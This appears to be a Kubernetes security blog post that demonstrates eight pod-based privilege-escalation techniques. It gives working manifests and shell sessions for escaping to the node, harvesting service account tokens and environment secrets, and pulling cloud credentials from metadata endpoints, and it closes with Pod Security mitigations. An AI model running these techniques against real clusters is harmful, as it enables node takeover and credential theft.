K8s: Vulnerability Voyage

Let's look at some common, simple ways to escalate privileges using K8s pods. Almost all of these attacks can be prevented with pod security policies.

Prerequisites

Access to a K8s cluster
Permissions to create a pod and exec into it
No pod security policy enforcement, either by K8s' native PodSecurityPolicy or by a third-party tool like Gatekeeper

Back to Basics

As you might know, pods are nothing but a group of Linux processes isolated by two features of the Linux kernel: namespaces and cgroups. Namespaces (hostname, PID, filesystem, network, IPC) give the process a "view" that hides everything outside of those namespaces, while cgroups limit the resources (CPU, RAM, block and network I/O) that the process can use.
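
To make the namespace idea a bit more concrete, here is a minimal sketch that prints the namespace identifiers of a process by reading the symlinks under /proc/<pid>/ns. The helper name ns_ids is made up for illustration, and it assumes a Linux system with /proc mounted.

```shell
# ns_ids is a hypothetical helper: print "<type> <id>" for every namespace of a PID.
# Two processes that show the same id for a type share that namespace.
ns_ids() {
  pid="${1:-$$}"                      # default to the current shell
  for ns in /proc/"$pid"/ns/*; do
    # each entry is a symlink such as pid -> pid:[4026531836]
    printf '%s %s\n' "${ns##*/}" "$(readlink "$ns")"
  done
}
```

Comparing the output of `ns_ids $$` inside a pod with the output on the node should show different ids for an isolated pod, and matching ids for whichever namespaces the pod shares with the host.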

Let's get started

K8s generally uses RBAC for authorization. Even when a user is not allowed to create pods directly, there are at least seven other ways for them to create one, using the built-in controllers: Job, CronJob, ReplicationController (not very common nowadays), ReplicaSet, Deployment, DaemonSet and StatefulSet, along with any number of custom controllers. So, if you are looking for ways to prevent your users from creating pods, look out for all of the different ways your cluster provides for creating them.
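
A quick way to see which of these paths are open to you is to ask the API server for each resource kind. The sketch below loops over the built-in kinds listed above using `kubectl auth can-i`; the helper name and the default namespace are assumptions, and custom controllers are not covered.

```shell
# Built-in resource kinds that end up creating pods (from the list above).
pod_creating_resources="pods jobs cronjobs replicationcontrollers replicasets deployments daemonsets statefulsets"

# check_pod_creation_paths is a hypothetical helper name.
# It asks, via `kubectl auth can-i`, whether the current user may create each kind.
check_pod_creation_paths() {
  ns="${1:-default}"
  for res in $pod_creating_resources; do
    # can-i exits non-zero on "no", so ignore the status and keep the printed answer
    answer="$(kubectl auth can-i create "$res" --namespace "$ns" 2>/dev/null || true)"
    printf '%-24s %s\n' "$res" "${answer:-unknown}"
  done
}
```

Calling `check_pod_creation_paths default` prints one line per kind; any "yes" is a way to get a pod scheduled, even if "pods" itself says "no".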

For our case, let's assume we have rights to create pod resources and to exec into them.

Modes

privileged - A privileged container is given access to all devices on the host. This gives the container nearly the same access as processes running on the host. This is useful for containers that need Linux capabilities such as manipulating the network stack or accessing devices.
hostPID
hostNetwork
hostIPC
hostPath

Attack 1 (Everything Allowed)

You can exec into the pod and chroot into the host's root filesystem (mounted at /host), effectively becoming root on the node running your pod. If it's a control-plane node, you can read secrets directly from etcd or use the credentials of other privileged control-plane components.

How

cat <<EOF  | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: everything-allowed
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: everything-allowed
    image: ubuntu
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  volumes:
  - name: noderoot
    hostPath:
      path: /
EOF


kubectl exec -it everything-allowed -- bash
root@minikube:/# docker ps
bash: docker: command not found
root@minikube:/# chroot /host
sh-5.0# docker ps | head -n2
CONTAINER ID   IMAGE                  COMMAND                  CREATED         STATUS         PORTS     NAMES
f3d3252343be   ubuntu                 "/bin/sh -c -- 'whil…"   2 minutes ago   Up 2 minutes             k8s_everything-allowed_everything-allowed_default_89e48ca1-97e6-49a5-a51c-325c95a916eb_0

Attack 2 (Privileged and HostPID)

privileged breaks down most of the walls that container isolation provides, and with hostPID the pod can see every process running on the host and enter its namespaces.

How

Let's nsenter into the init process's namespaces (from there on we'll have the same access as in Attack 1 (Everything Allowed)).

cat << EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: priv-and-hostpid
spec:
  hostPID: true
  containers:
  - name: priv-and-hostpid
    image: ubuntu
    tty: true
    securityContext:
      privileged: true
    command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ]
EOF

kubectl exec -it priv-and-hostpid -- bash
bash-5.0# docker ps | head -n2
CONTAINER ID   IMAGE                  COMMAND                  CREATED          STATUS          PORTS     NAMES
c050527a7218   ubuntu                 "nsenter --target 1 …"   3 minutes ago    Up 3 minutes              k8s_priv-and-hostpid_priv-and-hostpid_default_267457b6-97c4-4d5f-bcec-d165a425f2fe_0
bash-5.0# cat /var/lib/kubelet/config.yaml
apiVersion: kubelet.config.k8s.io/v1beta1
authentication:
  anonymous:
    enabled: false
  webhook:
    cacheTTL: 0s
    enabled: true
  x509:
    clientCAFile: /var/lib/minikube/certs/ca.crt
. . . . . .

Attack 3 (Privilege Only)

As in the first attack, privileged mode grants access to the node's devices under /dev. That means the block device holding the host's filesystem can be mounted inside the pod (this won't give a full view of the filesystem as in Attack 1, though).

How

cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: priv-pod
spec:
  containers:
  - name: priv-pod
    image: ubuntu
    securityContext:
      privileged: true
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
EOF


minikube ssh
                         _             _
            _         _ ( )           ( )
  ___ ___  (_)  ___  (_)| |/')  _   _ | |_      __
/' _ ` _ `\| |/' _ `\| || , <  ( ) ( )| '_`\  /'__`\
| ( ) ( ) || || ( ) || || |\`\ | (_) || |_) )(  ___/
(_) (_) (_)(_)(_) (_)(_)(_) (_)`\___/'(_,__/'`\____)

$ df
Filesystem     1K-blocks     Used Available Use% Mounted on
tmpfs            7345880   638328   6707552   9% /
. . . . . . . . .
tmpfs            4081044        8   4081036   1% /tmp
/dev/vda1      136554284 37411016  91262620  30% /mnt/vda1
. . . . . . . .


kubectl exec -it priv-pod -- bash
root@priv-pod:/# mkdir /tmp/host-fs
root@priv-pod:/# mount /dev/vda1 /tmp/host-fs/
root@priv-pod:/# cd /tmp/host-fs/
root@priv-pod:/tmp/host-fs# ls
data  hostpath-provisioner  hostpath_pv  lost+found  var
root@priv-pod:/tmp/host-fs# ls var/lib/docker/   # also var/lib/kubelet
buildkit  containerd  containers  image  network  overlay2  plugins  runtimes  swarm  tmp  trust  volumes
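
The session above took the device name (/dev/vda1) from df on the node, which an attacker inside the pod would not have. As a rough sketch, the pod can list candidate block devices itself from /proc/partitions. The helper name is hypothetical, and which devices show up depends entirely on the node.

```shell
# candidate_devices is a hypothetical helper: list the block devices named in a
# /proc/partitions-style file as /dev paths.
candidate_devices() {
  file="${1:-/proc/partitions}"
  # Skip the header line and blank lines; the 4th column is the device name.
  awk 'NR > 1 && NF == 4 { print "/dev/" $4 }' "$file"
}
```

Each path printed by `candidate_devices` can then be tried with mount, as in the session above.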

Attack 4 (HostPath Only)

If the administrators have not limited what you can mount, you can mount / on the host into your pod, giving you read/write access on the host’s filesystem.

Search for kubeconfig files - you might find a cluster-admin config file
Search for tokens in /var/lib/kubelet/pods/ - look for tokens that might give access to secrets in kube-system or that are bound to the cluster-admin role
Add your SSH key to the host

How

cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: hostpath-exec-pod
spec:
  containers:
  - name: hostpath
    image: ubuntu
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  volumes:
  - name: noderoot
    hostPath:
      path: /
EOF


kubectl exec -it hostpath-exec-pod -- bash
root@hostpath-exec-pod:/# cd /host/var/lib/kubelet/pods/
root@hostpath-exec-pod:/host/var/lib/kubelet/pods# cd <pod-id>/volumes/kubernetes.io~secret/default-token-w8dkr/
root@hostpath-exec-pod:/host/var/lib/kubelet/pods/. . .# ls -al
total 4
drwxrwxrwt 3 root root  140 Mar 22 04:31 .
drwxr-xr-x 3 root root 4096 Mar 22 04:31 ..
drwxr-xr-x 2 root root  100 Mar 22 04:31 ..2022_03_22_04_31_55.677028166
lrwxrwxrwx 1 root root   31 Mar 22 04:31 ..data -> ..2022_03_22_04_31_55.677028166
lrwxrwxrwx 1 root root   13 Mar 22 04:31 ca.crt -> ..data/ca.crt
lrwxrwxrwx 1 root root   16 Mar 22 04:31 namespace -> ..data/namespace
lrwxrwxrwx 1 root root   12 Mar 22 04:31 token -> ..data/token
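
Walking into each pod directory by hand gets tedious, so here is a minimal sketch that finds every mounted token under the kubelet pods directory and prints the namespace stored next to it. The helper name is hypothetical, and the layout is assumed to match the listing above (a token symlink inside a kubernetes.io~ volume directory).

```shell
# list_sa_tokens is a hypothetical helper: print "<namespace> <token path>" for
# every service account token symlink found under the kubelet pods directory.
list_sa_tokens() {
  root="${1:-/host/var/lib/kubelet/pods}"
  # -type l matches only the top-level "token" symlink, not the file it points to
  find "$root" -type l -name token -path '*/volumes/kubernetes.io~*' 2>/dev/null |
  while read -r tok; do
    ns_file="$(dirname "$tok")/namespace"
    ns="unknown"
    [ -r "$ns_file" ] && ns="$(cat "$ns_file")"
    printf '%s %s\n' "$ns" "$tok"
  done
}
```

Tokens whose namespace is kube-system are usually the first ones worth a closer look.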

Attack 5 (HostPID only)

With only hostPID, you can:

View processes on the host - running ps within the pod lists all the processes running on the host (including processes in other pods)
View the environment variables for each pod on the host (process UIDs should match) - you can read the /proc/[PID]/environ file for each process running on the host.
View the file descriptors for each pod on the host - you can read /proc/[PID]/fd/[X] for each process running on the host.
Kill processes - you can also kill any process on the node (presenting a denial-of-service risk)

You might get lucky and find secrets, tokens, etc. in the output of ps or in env vars.

How

cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: hostpid-pod
spec:
  hostPID: true
  containers:
  - name: hostpid-pod
    image: ubuntu
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
EOF


kubectl exec -it hostpid-pod -- bash
root@hostpid-pod:/# ps aux
. . . <removed for brevity> . . .
root        5828  0.0  0.1 710940  8512 ?        Sl   03:34   0:00 /usr/bin/containerd-shim-runc-v2 -namespace moby -id 25374a04ffcc777d5b0601a3af
root        5849  0.3  0.4 747660 38376 ?        Ssl  03:34   0:31 /coredns -conf /etc/coredns/Corefile
root        3348  1.5  0.9 10612728 74544 ?      Ssl  03:33   2:17 etcd --advertise-client-urls=https://192.168.64.3:2379 --cert-file=/var/lib/minikube/certs/etcd/server.crt --client-cert-auth=true --data-dir=/var/lib/minikube/etcd --initial-advertise-peer-urls=https://192.168.64.3:2380 --initial-cluster=minikube=https://192.168.64.3:2380 --key-file=/var/lib/minikube/certs/etcd/server.key
. . . . <removed for brevity> . . .

root@hostpid-pod:/# cat /proc/3348/environ
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binHOSTNAME=minikubeSSL_CERT_FILE=/etc/ssl/certs/ca-certificates.crtHOME=/root

You can only read environ for processes that share the same UID as your pod. To read the environ file of a process with a different UID (987, let's say), run the pod with runAsUser set to that UID.
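
The environ output above looks glued together because the entries are separated by NUL bytes, which the terminal doesn't show. A small sketch to split them onto separate lines and filter for interesting names follows; both helper names and the keyword list are assumptions for illustration.

```shell
# split_environ is a hypothetical helper: print one VAR=value per line from a
# NUL-separated environ file such as /proc/<pid>/environ.
split_environ() {
  tr '\0' '\n' < "$1"
}

# grep_environ_secrets: keep only entries whose name or value looks sensitive.
# The keyword list is illustrative, not exhaustive.
grep_environ_secrets() {
  split_environ "$1" | grep -iE 'token|secret|passw|key' || true
}
```

For example, `grep_environ_secrets /proc/3348/environ` would print only the matching variables of the etcd process from the session above, if there are any.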

Attack 6 (HostNetwork only)

With only hostNetwork set to true, you can't get privileged code execution on the host directly. But there are still some things you can look for:

Traffic sniffing - You can sniff traffic using tools like tcpdump and might find secrets/tokens being sent unencrypted.
Access services bound to localhost - You can access services listening only on the loopback address.
Bypass network policy - With hostNetwork: true, your pod won't be restricted by a network policy applied to a namespace or pod (because your pod isn't bound to pod networking).

How

cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: hostnetwork-pod
spec:
  hostNetwork: true
  containers:
  - name: hostnetwork
    image: ubuntu
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
EOF
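
Once inside the pod, one way to look for services bound to localhost without installing extra tools is to read /proc/net/tcp, which with hostNetwork should reflect the node's sockets. This is only a sketch: the helper name is made up, it covers IPv4 only, and it assumes a little-endian node (where 127.0.0.1 is written as 0100007F).

```shell
# loopback_listeners is a hypothetical helper: print the TCP ports that listen
# on 127.0.0.1 only, reading a /proc/net/tcp-style file.
loopback_listeners() {
  file="${1:-/proc/net/tcp}"
  # Column 2 is local address:port in hex, column 4 is the state (0A = LISTEN).
  awk 'NR > 1 && $4 == "0A" && $2 ~ /^0100007F:/ { split($2, a, ":"); print a[2] }' "$file" |
  while read -r hexport; do
    printf '%d\n' "0x$hexport"      # hex port to decimal
  done
}
```

Any port it prints can then be probed from the pod at 127.0.0.1.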

Attack 7 (HostIPC only)

There isn't much that can be done here. You'll be able to read/write the same files/mechanisms that other processes on the host use for IPC (e.g. /dev/shm). You should also check the other IPC mechanisms with ipcs and see if anything is written there.

How

cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: hostipc-pod
spec:
  hostIPC: true
  containers:
  - name: hostipc
    image: ubuntu
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
EOF


minikube ssh
                         _             _
            _         _ ( )           ( )
  ___ ___  (_)  ___  (_)| |/')  _   _ | |_      __
/' _ ` _ `\| |/' _ `\| || , <  ( ) ( )| '_`\  /'__`\
| ( ) ( ) || || ( ) || || |\`\ | (_) || |_) )(  ___/
(_) (_) (_)(_)(_) (_)(_)(_) (_)`\___/'(_,__/'`\____)

$ echo "secretpassword=usethissecret" > /dev/shm/secretpassword.txt

kubectl exec -it hostipc-pod -- bash
root@hostipc-pod:/# cat /dev/shm/secretpassword.txt
secretpassword=usethissecret

root@hostipc-pod:/# ipcs -a

------ Message Queues --------
key        msqid      owner      perms      used-bytes   messages

------ Shared Memory Segments --------
key        shmid      owner      perms      bytes      nattch     status

------ Semaphore Arrays --------
key        semid      owner      perms      nsems

Attack 8 (Nothing Allowed)

If the nodes run in a cloud environment, you can query the metadata service (you might find credentials for the cloud provider)

# AWS
curl http://169.254.169.254/latest/meta-data
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

# GCP
curl -H "Metadata-Flavor: Google" 'http://metadata/computeMetadata/v1/instance/'
curl -H 'Metadata-Flavor:Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/

# Azure
curl -H Metadata:true "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
curl -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
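
On AWS, the plain GET requests shown earlier only work where IMDSv1 is still allowed. If the instance enforces IMDSv2, a session token has to be fetched first and sent along with every request. A minimal sketch, with a made-up helper name and an arbitrary TTL value:

```shell
# imds_v2_get is a hypothetical helper: fetch a path from the AWS instance
# metadata service using an IMDSv2 session token.
imds_v2_get() {
  path="$1"    # e.g. meta-data/iam/security-credentials/
  # Step 1: request a session token (TTL in seconds is an arbitrary choice here)
  token="$(curl -sS -X PUT "http://169.254.169.254/latest/api/token" \
    -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")"
  # Step 2: send the token with the actual metadata request
  curl -sS -H "X-aws-ec2-metadata-token: $token" "http://169.254.169.254/latest/$path"
}
```

Whether the pod can reach the endpoint at all also depends on how the node's metadata options are configured.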

Overly permissive service account: By default, the default SA of the namespace is mounted into a pod. If that SA is overly permissive, you can use it to further escalate your permissions in the cluster.
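
To see what the mounted SA is actually allowed to do, you can ask the API server with a SelfSubjectRulesReview using the token from the pod. The sketch below assumes the standard mount path and in-cluster API address, uses a made-up helper name, and needs curl installed in the image.

```shell
# sa_rules_review is a hypothetical helper: ask the API server which rules
# apply to the service account token mounted in this pod.
sa_rules_review() {
  sa_dir="${1:-/var/run/secrets/kubernetes.io/serviceaccount}"
  api="${2:-https://kubernetes.default.svc}"
  token="$(cat "$sa_dir/token")"
  ns="$(cat "$sa_dir/namespace")"
  # POST a SelfSubjectRulesReview for the pod's own namespace
  curl -sS --cacert "$sa_dir/ca.crt" \
    -H "Authorization: Bearer $token" \
    -H "Content-Type: application/json" \
    -X POST "$api/apis/authorization.k8s.io/v1/selfsubjectrulesreviews" \
    -d "{\"apiVersion\":\"authorization.k8s.io/v1\",\"kind\":\"SelfSubjectRulesReview\",\"spec\":{\"namespace\":\"$ns\"}}"
}
```

The response lists the resource rules for that namespace; verbs like create on pods or get on secrets are the ones to look for.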

Conclusion

I just wanted to show how easy it is to gain unauthorized access to the underlying nodes, or the cluster itself, in the absence of proper security checks.

All of the above attacks (except Attack 8) can be mitigated using PodSecurityPolicies. PodSecurityPolicy is deprecated as of K8s 1.21 and was removed in 1.25; the Pod Security Admission controller (beta as of K8s 1.23) should be used instead.
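
With Pod Security Admission, enforcement is switched on per namespace through a label. A minimal sketch, assuming the admission controller is enabled on the cluster; the helper name and the baseline default are choices made for this example.

```shell
# enforce_pod_security is a hypothetical helper name.
# It sets the Pod Security Admission "enforce" label on a namespace.
enforce_pod_security() {
  ns="$1"
  level="${2:-baseline}"     # one of: privileged, baseline, restricted
  kubectl label --overwrite namespace "$ns" "pod-security.kubernetes.io/enforce=$level"
}
```

After `enforce_pod_security default`, the manifests from Attacks 1 to 7 should be rejected in that namespace, since the baseline level disallows privileged containers, host namespaces and hostPath volumes.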